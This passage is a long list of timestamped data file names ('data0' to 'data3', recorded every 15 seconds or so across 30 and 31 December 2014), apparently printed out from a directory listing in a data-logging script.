'data0Tue_Dec_30_22_26_54_2014.txt',\n 'data0Tue_Dec_30_22_27_09_2014.txt',\n 'data0Tue_Dec_30_22_27_24_2014.txt',\n 'data0Tue_Dec_30_22_27_39_2014.txt',\n 'data0Tue_Dec_30_22_27_54_2014.txt',\n 'data0Tue_Dec_30_22_28_09_2014.txt',\n 'data0Tue_Dec_30_22_28_23_2014.txt',\n 'data0Tue_Dec_30_22_28_38_2014.txt',\n 'data0Tue_Dec_30_22_28_53_2014.txt',\n 'data0Tue_Dec_30_22_29_08_2014.txt',\n 'data0Tue_Dec_30_22_29_23_2014.txt',\n 'data0Tue_Dec_30_22_29_37_2014.txt',\n 'data0Tue_Dec_30_22_29_52_2014.txt',\n 'data1Tue_Dec_30_22_30_07_2014.txt',\n 'data1Tue_Dec_30_22_30_21_2014.txt',\n 'data1Tue_Dec_30_22_30_36_2014.txt',\n 'data1Tue_Dec_30_22_30_51_2014.txt',\n 'data1Tue_Dec_30_22_31_06_2014.txt',\n 'data1Tue_Dec_30_22_31_20_2014.txt',\n 'data1Tue_Dec_30_22_31_35_2014.txt',\n 'data1Tue_Dec_30_22_31_49_2014.txt',\n 
'data1Tue_Dec_30_22_32_04_2014.txt',\n 'data1Tue_Dec_30_22_32_19_2014.txt',\n 'data1Tue_Dec_30_22_32_34_2014.txt',\n 'data1Tue_Dec_30_22_32_48_2014.txt',\n 'data1Tue_Dec_30_22_33_03_2014.txt',\n 'data1Tue_Dec_30_22_33_18_2014.txt',\n 'data1Tue_Dec_30_22_33_33_2014.txt',\n 'data1Tue_Dec_30_22_33_48_2014.txt',\n 'data1Tue_Dec_30_22_34_03_2014.txt',\n 'data1Tue_Dec_30_22_34_17_2014.txt',\n 'data1Tue_Dec_30_22_34_32_2014.txt',\n 'data1Tue_Dec_30_22_34_47_2014.txt',\n 'data1Tue_Dec_30_22_35_01_2014.txt',\n 'data1Tue_Dec_30_22_35_16_2014.txt',\n 'data1Tue_Dec_30_22_35_31_2014.txt',\n 'data1Tue_Dec_30_22_35_46_2014.txt',\n 'data1Tue_Dec_30_22_36_01_2014.txt',\n 'data1Tue_Dec_30_22_36_16_2014.txt',\n 'data1Tue_Dec_30_22_36_30_2014.txt',\n 'data1Tue_Dec_30_22_36_45_2014.txt',\n 'data1Tue_Dec_30_22_37_00_2014.txt',\n 'data1Tue_Dec_30_22_37_15_2014.txt',\n 'data1Tue_Dec_30_22_37_30_2014.txt',\n 'data1Tue_Dec_30_22_37_44_2014.txt',\n 'data1Tue_Dec_30_22_37_59_2014.txt',\n 'data1Tue_Dec_30_22_38_14_2014.txt',\n 'data1Tue_Dec_30_22_38_28_2014.txt',\n 'data1Tue_Dec_30_22_38_44_2014.txt',\n 'data1Tue_Dec_30_22_38_58_2014.txt',\n 'data1Tue_Dec_30_22_39_13_2014.txt',\n 'data1Tue_Dec_30_22_39_28_2014.txt',\n 'data1Tue_Dec_30_22_39_42_2014.txt',\n 'data1Tue_Dec_30_22_39_57_2014.txt',\n 'data1Tue_Dec_30_22_40_13_2014.txt',\n 'data1Tue_Dec_30_22_40_27_2014.txt',\n 'data1Tue_Dec_30_22_40_41_2014.txt',\n 'data1Tue_Dec_30_22_40_56_2014.txt',\n 'data1Tue_Dec_30_22_41_11_2014.txt',\n 'data1Tue_Dec_30_22_41_26_2014.txt',\n 'data1Tue_Dec_30_22_41_41_2014.txt',\n 'data1Tue_Dec_30_22_41_56_2014.txt',\n 'data1Tue_Dec_30_22_42_10_2014.txt',\n 'data2Tue_Dec_30_22_42_25_2014.txt',\n 'data2Tue_Dec_30_22_42_40_2014.txt',\n 'data2Tue_Dec_30_22_42_54_2014.txt',\n 'data2Tue_Dec_30_22_43_09_2014.txt',\n 'data2Tue_Dec_30_22_43_24_2014.txt',\n 'data2Tue_Dec_30_22_43_39_2014.txt',\n 'data2Tue_Dec_30_22_43_53_2014.txt',\n 'data2Tue_Dec_30_22_44_08_2014.txt',\n 'data2Tue_Dec_30_22_44_23_2014.txt',\n 
'data2Tue_Dec_30_22_44_37_2014.txt',\n 'data2Tue_Dec_30_22_44_52_2014.txt',\n 'data2Tue_Dec_30_22_45_06_2014.txt',\n 'data2Tue_Dec_30_22_45_21_2014.txt',\n 'data2Tue_Dec_30_22_45_36_2014.txt',\n 'data2Tue_Dec_30_22_45_50_2014.txt',\n 'data2Tue_Dec_30_22_46_05_2014.txt',\n 'data2Tue_Dec_30_22_46_20_2014.txt',\n 'data2Tue_Dec_30_22_46_35_2014.txt',\n 'data2Tue_Dec_30_22_46_50_2014.txt',\n 'data2Tue_Dec_30_22_47_05_2014.txt',\n 'data2Tue_Dec_30_22_47_20_2014.txt',\n 'data2Tue_Dec_30_22_47_35_2014.txt',\n 'data2Tue_Dec_30_22_47_49_2014.txt',\n 'data2Tue_Dec_30_22_48_04_2014.txt',\n 'data2Tue_Dec_30_22_48_19_2014.txt',\n 'data2Tue_Dec_30_22_48_34_2014.txt',\n 'data2Tue_Dec_30_22_48_49_2014.txt',\n 'data2Tue_Dec_30_22_49_04_2014.txt',\n 'data2Tue_Dec_30_22_49_19_2014.txt',\n 'data2Tue_Dec_30_22_49_34_2014.txt',\n 'data2Tue_Dec_30_22_49_49_2014.txt',\n 'data2Tue_Dec_30_22_50_04_2014.txt',\n 'data2Tue_Dec_30_22_50_19_2014.txt',\n 'data2Tue_Dec_30_22_50_33_2014.txt',\n 'data2Tue_Dec_30_22_50_48_2014.txt',\n 'data2Tue_Dec_30_22_51_03_2014.txt',\n 'data2Tue_Dec_30_22_51_18_2014.txt',\n 'data2Tue_Dec_30_22_51_32_2014.txt',\n 'data2Tue_Dec_30_22_51_47_2014.txt',\n 'data2Tue_Dec_30_22_52_02_2014.txt',\n 'data2Tue_Dec_30_22_52_16_2014.txt',\n 'data2Tue_Dec_30_22_52_31_2014.txt',\n 'data2Tue_Dec_30_22_52_46_2014.txt',\n 'data2Tue_Dec_30_22_53_01_2014.txt',\n 'data2Tue_Dec_30_22_53_16_2014.txt',\n 'data2Tue_Dec_30_22_53_31_2014.txt',\n 'data2Tue_Dec_30_22_53_45_2014.txt',\n 'data2Tue_Dec_30_22_54_00_2014.txt',\n 'data2Tue_Dec_30_22_54_15_2014.txt',\n 'data2Tue_Dec_30_22_54_29_2014.txt',\n 'data3Tue_Dec_30_22_54_44_2014.txt',\n 'data3Tue_Dec_30_22_54_59_2014.txt',\n 'data3Tue_Dec_30_22_55_13_2014.txt',\n 'data3Tue_Dec_30_22_55_28_2014.txt',\n 'data3Tue_Dec_30_22_55_43_2014.txt',\n 'data3Tue_Dec_30_22_55_58_2014.txt',\n 'data3Tue_Dec_30_22_56_13_2014.txt',\n 'data3Tue_Dec_30_22_56_28_2014.txt',\n 'data3Tue_Dec_30_22_56_43_2014.txt',\n 'data3Tue_Dec_30_22_56_57_2014.txt',\n 
'data3Tue_Dec_30_22_57_12_2014.txt',\n 'data3Tue_Dec_30_22_57_27_2014.txt',\n 'data3Tue_Dec_30_22_57_42_2014.txt',\n 'data3Tue_Dec_30_22_57_56_2014.txt',\n 'data3Tue_Dec_30_22_58_12_2014.txt',\n 'data3Tue_Dec_30_22_58_26_2014.txt',\n 'data3Tue_Dec_30_22_58_41_2014.txt',\n 'data3Tue_Dec_30_22_58_56_2014.txt',\n 'data3Tue_Dec_30_22_59_10_2014.txt',\n 'data3Tue_Dec_30_22_59_25_2014.txt',\n 'data3Tue_Dec_30_22_59_40_2014.txt',\n 'data3Tue_Dec_30_22_59_54_2014.txt',\n 'data3Tue_Dec_30_23_00_10_2014.txt',\n 'data3Tue_Dec_30_23_00_25_2014.txt',\n 'data3Tue_Dec_30_23_00_39_2014.txt',\n 'data3Tue_Dec_30_23_00_54_2014.txt',\n 'data3Tue_Dec_30_23_01_09_2014.txt',\n 'data3Tue_Dec_30_23_01_23_2014.txt',\n 'data3Tue_Dec_30_23_01_38_2014.txt',\n 'data3Tue_Dec_30_23_01_53_2014.txt',\n 'data3Tue_Dec_30_23_02_07_2014.txt',\n 'data3Tue_Dec_30_23_02_22_2014.txt',\n 'data3Tue_Dec_30_23_02_37_2014.txt',\n 'data3Tue_Dec_30_23_02_52_2014.txt',\n 'data3Tue_Dec_30_23_03_06_2014.txt',\n 'data3Tue_Dec_30_23_03_21_2014.txt',\n 'data3Tue_Dec_30_23_03_36_2014.txt',\n 'data3Tue_Dec_30_23_03_51_2014.txt',\n 'data3Tue_Dec_30_23_04_05_2014.txt',\n 'data3Tue_Dec_30_23_04_20_2014.txt',\n 'data3Tue_Dec_30_23_04_34_2014.txt',\n 'data3Tue_Dec_30_23_04_49_2014.txt',\n 'data3Tue_Dec_30_23_05_04_2014.txt',\n 'data3Tue_Dec_30_23_05_19_2014.txt',\n 'data3Tue_Dec_30_23_05_34_2014.txt',\n 'data3Tue_Dec_30_23_05_49_2014.txt',\n 'data3Tue_Dec_30_23_06_04_2014.txt',\n 'data3Tue_Dec_30_23_06_18_2014.txt',\n 'data3Tue_Dec_30_23_06_33_2014.txt',\n 'data3Tue_Dec_30_23_06_48_2014.txt',\n 'data0Tue_Dec_30_23_07_28_2014.txt',\n 'data0Tue_Dec_30_23_07_42_2014.txt',\n 'data0Tue_Dec_30_23_07_58_2014.txt',\n 'data0Tue_Dec_30_23_08_12_2014.txt',\n 'data0Tue_Dec_30_23_08_27_2014.txt',\n 'data0Tue_Dec_30_23_08_42_2014.txt',\n 'data0Tue_Dec_30_23_08_57_2014.txt',\n 'data0Tue_Dec_30_23_09_12_2014.txt',\n 'data0Tue_Dec_30_23_09_27_2014.txt',\n 'data0Tue_Dec_30_23_09_42_2014.txt',\n 'data0Tue_Dec_30_23_09_57_2014.txt',\n 
'data0Tue_Dec_30_23_10_12_2014.txt',\n 'data0Tue_Dec_30_23_10_26_2014.txt',\n 'data0Tue_Dec_30_23_10_42_2014.txt',\n 'data0Tue_Dec_30_23_10_57_2014.txt',\n 'data0Tue_Dec_30_23_11_12_2014.txt',\n 'data0Tue_Dec_30_23_11_27_2014.txt',\n 'data0Tue_Dec_30_23_11_42_2014.txt',\n 'data0Tue_Dec_30_23_11_56_2014.txt',\n 'data0Tue_Dec_30_23_12_11_2014.txt',\n 'data0Tue_Dec_30_23_12_26_2014.txt',\n 'data0Tue_Dec_30_23_12_40_2014.txt',\n 'data0Tue_Dec_30_23_12_55_2014.txt',\n 'data0Tue_Dec_30_23_13_10_2014.txt',\n 'data0Tue_Dec_30_23_13_25_2014.txt',\n 'data0Tue_Dec_30_23_13_40_2014.txt',\n 'data0Tue_Dec_30_23_13_55_2014.txt',\n 'data0Tue_Dec_30_23_14_11_2014.txt',\n 'data0Tue_Dec_30_23_14_26_2014.txt',\n 'data0Tue_Dec_30_23_14_40_2014.txt',\n 'data0Tue_Dec_30_23_14_55_2014.txt',\n 'data0Tue_Dec_30_23_15_09_2014.txt',\n 'data0Tue_Dec_30_23_15_24_2014.txt',\n 'data0Tue_Dec_30_23_15_39_2014.txt',\n 'data0Tue_Dec_30_23_15_54_2014.txt',\n 'data0Tue_Dec_30_23_16_08_2014.txt',\n 'data0Tue_Dec_30_23_16_23_2014.txt',\n 'data0Tue_Dec_30_23_16_37_2014.txt',\n 'data0Tue_Dec_30_23_16_52_2014.txt',\n 'data0Tue_Dec_30_23_17_08_2014.txt',\n 'data0Tue_Dec_30_23_17_23_2014.txt',\n 'data0Tue_Dec_30_23_17_37_2014.txt',\n 'data0Tue_Dec_30_23_17_52_2014.txt',\n 'data0Tue_Dec_30_23_18_07_2014.txt',\n 'data0Tue_Dec_30_23_18_22_2014.txt',\n 'data0Tue_Dec_30_23_18_36_2014.txt',\n 'data0Tue_Dec_30_23_18_51_2014.txt',\n 'data0Tue_Dec_30_23_19_06_2014.txt',\n 'data0Tue_Dec_30_23_19_21_2014.txt',\n 'data0Tue_Dec_30_23_19_36_2014.txt',\n 'data1Tue_Dec_30_23_19_50_2014.txt',\n 'data1Tue_Dec_30_23_20_05_2014.txt',\n 'data1Tue_Dec_30_23_20_20_2014.txt',\n 'data1Tue_Dec_30_23_20_34_2014.txt',\n 'data1Tue_Dec_30_23_20_49_2014.txt',\n 'data1Tue_Dec_30_23_21_04_2014.txt',\n 'data1Tue_Dec_30_23_21_19_2014.txt',\n 'data1Tue_Dec_30_23_21_33_2014.txt',\n 'data1Tue_Dec_30_23_21_48_2014.txt',\n 'data1Tue_Dec_30_23_22_03_2014.txt',\n 'data1Tue_Dec_30_23_22_18_2014.txt',\n 'data1Tue_Dec_30_23_22_33_2014.txt',\n 
'data1Tue_Dec_30_23_22_48_2014.txt',\n 'data1Tue_Dec_30_23_23_03_2014.txt',\n 'data1Tue_Dec_30_23_23_17_2014.txt',\n 'data1Tue_Dec_30_23_23_32_2014.txt',\n 'data1Tue_Dec_30_23_23_47_2014.txt',\n 'data1Tue_Dec_30_23_24_02_2014.txt',\n 'data1Tue_Dec_30_23_24_16_2014.txt',\n 'data1Tue_Dec_30_23_24_31_2014.txt',\n 'data1Tue_Dec_30_23_24_45_2014.txt',\n 'data1Tue_Dec_30_23_25_00_2014.txt',\n 'data1Tue_Dec_30_23_25_15_2014.txt',\n 'data1Tue_Dec_30_23_25_29_2014.txt',\n 'data1Tue_Dec_30_23_25_44_2014.txt',\n 'data1Tue_Dec_30_23_25_59_2014.txt',\n 'data1Tue_Dec_30_23_26_13_2014.txt',\n 'data1Tue_Dec_30_23_26_28_2014.txt',\n 'data1Tue_Dec_30_23_26_43_2014.txt',\n 'data1Tue_Dec_30_23_26_58_2014.txt',\n 'data1Tue_Dec_30_23_27_13_2014.txt',\n 'data1Tue_Dec_30_23_27_27_2014.txt',\n 'data1Tue_Dec_30_23_27_42_2014.txt',\n 'data1Tue_Dec_30_23_27_57_2014.txt',\n 'data1Tue_Dec_30_23_28_11_2014.txt',\n 'data1Tue_Dec_30_23_28_26_2014.txt',\n 'data1Tue_Dec_30_23_28_42_2014.txt',\n 'data1Tue_Dec_30_23_28_56_2014.txt',\n 'data1Tue_Dec_30_23_29_11_2014.txt',\n 'data1Tue_Dec_30_23_29_26_2014.txt',\n 'data1Tue_Dec_30_23_29_41_2014.txt',\n 'data1Tue_Dec_30_23_29_56_2014.txt',\n 'data1Tue_Dec_30_23_30_10_2014.txt',\n 'data1Tue_Dec_30_23_30_25_2014.txt',\n 'data1Tue_Dec_30_23_30_40_2014.txt',\n 'data1Tue_Dec_30_23_30_55_2014.txt',\n 'data1Tue_Dec_30_23_31_10_2014.txt',\n 'data1Tue_Dec_30_23_31_25_2014.txt',\n 'data1Tue_Dec_30_23_31_39_2014.txt',\n 'data1Tue_Dec_30_23_31_54_2014.txt',\n 'data2Tue_Dec_30_23_32_09_2014.txt',\n 'data2Tue_Dec_30_23_32_24_2014.txt',\n 'data2Tue_Dec_30_23_32_39_2014.txt',\n 'data2Tue_Dec_30_23_32_53_2014.txt',\n 'data2Tue_Dec_30_23_33_08_2014.txt',\n 'data2Tue_Dec_30_23_33_23_2014.txt',\n 'data2Tue_Dec_30_23_33_38_2014.txt',\n 'data2Tue_Dec_30_23_33_53_2014.txt',\n 'data2Tue_Dec_30_23_34_08_2014.txt',\n 'data2Tue_Dec_30_23_34_23_2014.txt',\n 'data2Tue_Dec_30_23_34_37_2014.txt',\n 'data2Tue_Dec_30_23_34_52_2014.txt',\n 'data2Tue_Dec_30_23_35_07_2014.txt',\n 
'data2Tue_Dec_30_23_35_22_2014.txt',\n 'data2Tue_Dec_30_23_35_37_2014.txt',\n 'data2Tue_Dec_30_23_35_52_2014.txt',\n 'data2Tue_Dec_30_23_36_07_2014.txt',\n 'data2Tue_Dec_30_23_36_22_2014.txt',\n 'data2Tue_Dec_30_23_36_36_2014.txt',\n 'data2Tue_Dec_30_23_36_51_2014.txt',\n 'data2Tue_Dec_30_23_37_06_2014.txt',\n 'data2Tue_Dec_30_23_37_20_2014.txt',\n 'data2Tue_Dec_30_23_37_35_2014.txt',\n 'data2Tue_Dec_30_23_37_50_2014.txt',\n 'data2Tue_Dec_30_23_38_05_2014.txt',\n 'data2Tue_Dec_30_23_38_20_2014.txt',\n 'data2Tue_Dec_30_23_38_35_2014.txt',\n 'data2Tue_Dec_30_23_38_50_2014.txt',\n 'data2Tue_Dec_30_23_39_05_2014.txt',\n 'data2Tue_Dec_30_23_39_19_2014.txt',\n 'data2Tue_Dec_30_23_39_34_2014.txt',\n 'data2Tue_Dec_30_23_39_49_2014.txt',\n 'data2Tue_Dec_30_23_40_04_2014.txt',\n 'data2Tue_Dec_30_23_40_18_2014.txt',\n 'data2Tue_Dec_30_23_40_33_2014.txt',\n 'data2Tue_Dec_30_23_40_48_2014.txt',\n 'data2Tue_Dec_30_23_41_03_2014.txt',\n 'data2Tue_Dec_30_23_41_18_2014.txt',\n 'data2Tue_Dec_30_23_41_33_2014.txt',\n 'data2Tue_Dec_30_23_41_48_2014.txt',\n 'data2Tue_Dec_30_23_42_03_2014.txt',\n 'data2Tue_Dec_30_23_42_18_2014.txt',\n 'data2Tue_Dec_30_23_42_33_2014.txt',\n 'data2Tue_Dec_30_23_42_47_2014.txt',\n 'data2Tue_Dec_30_23_43_02_2014.txt',\n 'data2Tue_Dec_30_23_43_18_2014.txt',\n 'data2Tue_Dec_30_23_43_33_2014.txt',\n 'data2Tue_Dec_30_23_43_47_2014.txt',\n 'data2Tue_Dec_30_23_44_02_2014.txt',\n 'data2Tue_Dec_30_23_44_17_2014.txt',\n 'data3Tue_Dec_30_23_44_32_2014.txt',\n 'data3Tue_Dec_30_23_44_46_2014.txt',\n 'data3Tue_Dec_30_23_45_01_2014.txt',\n 'data3Tue_Dec_30_23_45_16_2014.txt',\n 'data3Tue_Dec_30_23_45_31_2014.txt',\n 'data3Tue_Dec_30_23_45_46_2014.txt',\n 'data3Tue_Dec_30_23_46_00_2014.txt',\n 'data3Tue_Dec_30_23_46_16_2014.txt',\n 'data3Tue_Dec_30_23_46_31_2014.txt',\n 'data3Tue_Dec_30_23_46_46_2014.txt',\n 'data3Tue_Dec_30_23_47_01_2014.txt',\n 'data3Tue_Dec_30_23_47_16_2014.txt',\n 'data3Tue_Dec_30_23_47_31_2014.txt',\n 'data3Tue_Dec_30_23_47_46_2014.txt',\n 
'data3Tue_Dec_30_23_48_01_2014.txt',\n 'data3Tue_Dec_30_23_48_16_2014.txt',\n 'data3Tue_Dec_30_23_48_31_2014.txt',\n 'data3Tue_Dec_30_23_48_45_2014.txt',\n 'data3Tue_Dec_30_23_49_00_2014.txt',\n 'data3Tue_Dec_30_23_49_15_2014.txt',\n 'data3Tue_Dec_30_23_49_30_2014.txt',\n 'data3Tue_Dec_30_23_49_45_2014.txt',\n 'data3Tue_Dec_30_23_49_59_2014.txt',\n 'data3Tue_Dec_30_23_50_14_2014.txt',\n 'data3Tue_Dec_30_23_50_29_2014.txt',\n 'data3Tue_Dec_30_23_50_44_2014.txt',\n 'data3Tue_Dec_30_23_50_59_2014.txt',\n 'data3Tue_Dec_30_23_51_13_2014.txt',\n 'data3Tue_Dec_30_23_51_28_2014.txt',\n 'data3Tue_Dec_30_23_51_43_2014.txt',\n 'data3Tue_Dec_30_23_51_57_2014.txt',\n 'data3Tue_Dec_30_23_52_13_2014.txt',\n 'data3Tue_Dec_30_23_52_28_2014.txt',\n 'data3Tue_Dec_30_23_52_43_2014.txt',\n 'data3Tue_Dec_30_23_52_58_2014.txt',\n 'data3Tue_Dec_30_23_53_12_2014.txt',\n 'data3Tue_Dec_30_23_53_27_2014.txt',\n 'data3Tue_Dec_30_23_53_42_2014.txt',\n 'data3Tue_Dec_30_23_53_56_2014.txt',\n 'data3Tue_Dec_30_23_54_11_2014.txt',\n 'data3Tue_Dec_30_23_54_26_2014.txt',\n 'data3Tue_Dec_30_23_54_41_2014.txt',\n 'data3Tue_Dec_30_23_54_56_2014.txt',\n 'data3Tue_Dec_30_23_55_11_2014.txt',\n 'data3Tue_Dec_30_23_55_26_2014.txt',\n 'data3Tue_Dec_30_23_55_41_2014.txt',\n 'data3Tue_Dec_30_23_55_55_2014.txt',\n 'data3Tue_Dec_30_23_56_10_2014.txt',\n 'data3Tue_Dec_30_23_56_25_2014.txt',\n 'data3Tue_Dec_30_23_56_40_2014.txt',\n 'data0Tue_Dec_30_23_57_21_2014.txt',\n 'data0Tue_Dec_30_23_57_36_2014.txt',\n 'data0Tue_Dec_30_23_57_51_2014.txt',\n 'data0Tue_Dec_30_23_58_06_2014.txt',\n 'data0Tue_Dec_30_23_58_20_2014.txt',\n 'data0Tue_Dec_30_23_58_35_2014.txt',\n 'data0Tue_Dec_30_23_58_50_2014.txt',\n 'data0Tue_Dec_30_23_59_05_2014.txt',\n 'data0Tue_Dec_30_23_59_20_2014.txt',\n 'data0Tue_Dec_30_23_59_35_2014.txt',\n 'data0Tue_Dec_30_23_59_49_2014.txt',\n 'data0Wed_Dec_31_00_00_04_2014.txt',\n 'data0Wed_Dec_31_00_00_18_2014.txt',\n 'data0Wed_Dec_31_00_00_33_2014.txt',\n 'data0Wed_Dec_31_00_00_48_2014.txt',\n 
'data0Wed_Dec_31_00_01_02_2014.txt',\n 'data0Wed_Dec_31_00_01_17_2014.txt',\n 'data0Wed_Dec_31_00_01_32_2014.txt',\n 'data0Wed_Dec_31_00_01_48_2014.txt',\n 'data0Wed_Dec_31_00_02_02_2014.txt',\n 'data0Wed_Dec_31_00_02_18_2014.txt',\n 'data0Wed_Dec_31_00_02_32_2014.txt',\n 'data0Wed_Dec_31_00_02_47_2014.txt',\n 'data0Wed_Dec_31_00_03_01_2014.txt',\n 'data0Wed_Dec_31_00_03_17_2014.txt',\n 'data0Wed_Dec_31_00_03_32_2014.txt',\n 'data0Wed_Dec_31_00_03_46_2014.txt',\n 'data0Wed_Dec_31_00_04_01_2014.txt',\n 'data0Wed_Dec_31_00_04_16_2014.txt',\n 'data0Wed_Dec_31_00_04_31_2014.txt',\n 'data0Wed_Dec_31_00_04_46_2014.txt',\n 'data0Wed_Dec_31_00_05_00_2014.txt',\n 'data0Wed_Dec_31_00_05_15_2014.txt',\n 'data0Wed_Dec_31_00_05_31_2014.txt',\n 'data0Wed_Dec_31_00_05_46_2014.txt',\n 'data0Wed_Dec_31_00_06_01_2014.txt',\n 'data0Wed_Dec_31_00_06_15_2014.txt',\n 'data0Wed_Dec_31_00_06_30_2014.txt',\n 'data0Wed_Dec_31_00_06_45_2014.txt',\n 'data0Wed_Dec_31_00_07_00_2014.txt',\n 'data0Wed_Dec_31_00_07_14_2014.txt',\n 'data0Wed_Dec_31_00_07_29_2014.txt',\n 'data0Wed_Dec_31_00_07_44_2014.txt',\n 'data0Wed_Dec_31_00_07_59_2014.txt',\n 'data0Wed_Dec_31_00_08_13_2014.txt',\n 'data0Wed_Dec_31_00_08_28_2014.txt',\n 'data0Wed_Dec_31_00_08_43_2014.txt',\n 'data0Wed_Dec_31_00_08_57_2014.txt',\n 'data0Wed_Dec_31_00_09_12_2014.txt',\n 'data0Wed_Dec_31_00_09_27_2014.txt',\n 'data1Wed_Dec_31_00_09_42_2014.txt',\n 'data1Wed_Dec_31_00_09_57_2014.txt',\n 'data1Wed_Dec_31_00_10_11_2014.txt',\n 'data1Wed_Dec_31_00_10_26_2014.txt',\n 'data1Wed_Dec_31_00_10_41_2014.txt',\n 'data1Wed_Dec_31_00_10_56_2014.txt',\n 'data1Wed_Dec_31_00_11_11_2014.txt',\n 'data1Wed_Dec_31_00_11_26_2014.txt',\n 'data1Wed_Dec_31_00_11_40_2014.txt',\n 'data1Wed_Dec_31_00_11_55_2014.txt',\n 'data1Wed_Dec_31_00_12_10_2014.txt',\n 'data1Wed_Dec_31_00_12_25_2014.txt',\n 'data1Wed_Dec_31_00_12_40_2014.txt',\n 'data1Wed_Dec_31_00_12_54_2014.txt',\n 'data1Wed_Dec_31_00_13_09_2014.txt',\n 'data1Wed_Dec_31_00_13_24_2014.txt',\n 
'data1Wed_Dec_31_00_13_39_2014.txt',\n 'data1Wed_Dec_31_00_13_54_2014.txt',\n 'data1Wed_Dec_31_00_14_09_2014.txt',\n 'data1Wed_Dec_31_00_14_24_2014.txt',\n 'data1Wed_Dec_31_00_14_38_2014.txt',\n 'data1Wed_Dec_31_00_14_53_2014.txt',\n 'data1Wed_Dec_31_00_15_07_2014.txt',\n 'data1Wed_Dec_31_00_15_22_2014.txt',\n 'data1Wed_Dec_31_00_15_37_2014.txt',\n 'data1Wed_Dec_31_00_15_52_2014.txt',\n 'data1Wed_Dec_31_00_16_06_2014.txt',\n 'data1Wed_Dec_31_00_16_22_2014.txt',\n 'data1Wed_Dec_31_00_16_38_2014.txt',\n 'data1Wed_Dec_31_00_16_52_2014.txt',\n 'data1Wed_Dec_31_00_17_07_2014.txt',\n 'data1Wed_Dec_31_00_17_22_2014.txt',\n 'data1Wed_Dec_31_00_17_37_2014.txt',\n 'data1Wed_Dec_31_00_17_51_2014.txt',\n 'data1Wed_Dec_31_00_18_06_2014.txt',\n 'data1Wed_Dec_31_00_18_20_2014.txt',\n 'data1Wed_Dec_31_00_18_35_2014.txt',\n 'data1Wed_Dec_31_00_18_50_2014.txt',\n 'data1Wed_Dec_31_00_19_04_2014.txt',\n 'data1Wed_Dec_31_00_19_19_2014.txt',\n 'data1Wed_Dec_31_00_19_34_2014.txt',\n 'data1Wed_Dec_31_00_19_48_2014.txt',\n 'data1Wed_Dec_31_00_20_03_2014.txt',\n 'data1Wed_Dec_31_00_20_18_2014.txt',\n 'data1Wed_Dec_31_00_20_33_2014.txt',\n 'data1Wed_Dec_31_00_20_48_2014.txt',\n 'data1Wed_Dec_31_00_21_03_2014.txt',\n 'data1Wed_Dec_31_00_21_18_2014.txt',\n 'data1Wed_Dec_31_00_21_32_2014.txt',\n 'data1Wed_Dec_31_00_21_47_2014.txt',\n 'data2Wed_Dec_31_00_22_02_2014.txt',\n 'data2Wed_Dec_31_00_22_17_2014.txt',\n 'data2Wed_Dec_31_00_22_32_2014.txt',\n 'data2Wed_Dec_31_00_22_47_2014.txt',\n 'data2Wed_Dec_31_00_23_01_2014.txt',\n 'data2Wed_Dec_31_00_23_16_2014.txt',\n 'data2Wed_Dec_31_00_23_31_2014.txt',\n 'data2Wed_Dec_31_00_23_46_2014.txt',\n 'data2Wed_Dec_31_00_24_01_2014.txt',\n 'data2Wed_Dec_31_00_24_16_2014.txt',\n 'data2Wed_Dec_31_00_24_30_2014.txt',\n 'data2Wed_Dec_31_00_24_45_2014.txt',\n 'data2Wed_Dec_31_00_25_00_2014.txt',\n 'data2Wed_Dec_31_00_25_15_2014.txt',\n 'data2Wed_Dec_31_00_25_29_2014.txt',\n 'data2Wed_Dec_31_00_25_44_2014.txt',\n 'data2Wed_Dec_31_00_25_59_2014.txt',\n 
'data2Wed_Dec_31_00_26_14_2014.txt',\n 'data2Wed_Dec_31_00_26_29_2014.txt',\n 'data2Wed_Dec_31_00_26_43_2014.txt',\n 'data2Wed_Dec_31_00_26_59_2014.txt',\n 'data2Wed_Dec_31_00_27_13_2014.txt',\n 'data2Wed_Dec_31_00_27_28_2014.txt',\n 'data2Wed_Dec_31_00_27_43_2014.txt',\n 'data2Wed_Dec_31_00_27_58_2014.txt',\n 'data2Wed_Dec_31_00_28_13_2014.txt',\n 'data2Wed_Dec_31_00_28_28_2014.txt',\n 'data2Wed_Dec_31_00_28_43_2014.txt',\n 'data2Wed_Dec_31_00_28_57_2014.txt',\n 'data2Wed_Dec_31_00_29_12_2014.txt',\n 'data2Wed_Dec_31_00_29_27_2014.txt',\n 'data2Wed_Dec_31_00_29_42_2014.txt',\n 'data2Wed_Dec_31_00_29_57_2014.txt',\n 'data2Wed_Dec_31_00_30_12_2014.txt',\n 'data2Wed_Dec_31_00_30_27_2014.txt',\n 'data2Wed_Dec_31_00_30_42_2014.txt',\n 'data2Wed_Dec_31_00_30_57_2014.txt',\n 'data2Wed_Dec_31_00_31_12_2014.txt',\n 'data2Wed_Dec_31_00_31_27_2014.txt',\n 'data2Wed_Dec_31_00_31_41_2014.txt',\n 'data2Wed_Dec_31_00_31_56_2014.txt',\n 'data2Wed_Dec_31_00_32_11_2014.txt',\n 'data2Wed_Dec_31_00_32_26_2014.txt',\n 'data2Wed_Dec_31_00_32_40_2014.txt',\n 'data2Wed_Dec_31_00_32_55_2014.txt',\n 'data2Wed_Dec_31_00_33_10_2014.txt',\n 'data2Wed_Dec_31_00_33_24_2014.txt',\n 'data2Wed_Dec_31_00_33_39_2014.txt',\n 'data2Wed_Dec_31_00_33_54_2014.txt',\n 'data2Wed_Dec_31_00_34_09_2014.txt',\n 'data3Wed_Dec_31_00_34_24_2014.txt',\n 'data3Wed_Dec_31_00_34_39_2014.txt',\n 'data3Wed_Dec_31_00_34_54_2014.txt',\n 'data3Wed_Dec_31_00_35_09_2014.txt',\n 'data3Wed_Dec_31_00_35_24_2014.txt',\n 'data3Wed_Dec_31_00_35_39_2014.txt',\n 'data3Wed_Dec_31_00_35_54_2014.txt',\n 'data3Wed_Dec_31_00_36_08_2014.txt',\n 'data3Wed_Dec_31_00_36_23_2014.txt',\n 'data3Wed_Dec_31_00_36_38_2014.txt',\n 'data3Wed_Dec_31_00_36_53_2014.txt',\n 'data3Wed_Dec_31_00_37_08_2014.txt',\n 'data3Wed_Dec_31_00_37_22_2014.txt',\n 'data3Wed_Dec_31_00_37_38_2014.txt',\n 'data3Wed_Dec_31_00_37_53_2014.txt',\n 'data3Wed_Dec_31_00_38_08_2014.txt',\n 'data3Wed_Dec_31_00_38_22_2014.txt',\n 'data3Wed_Dec_31_00_38_37_2014.txt',\n 
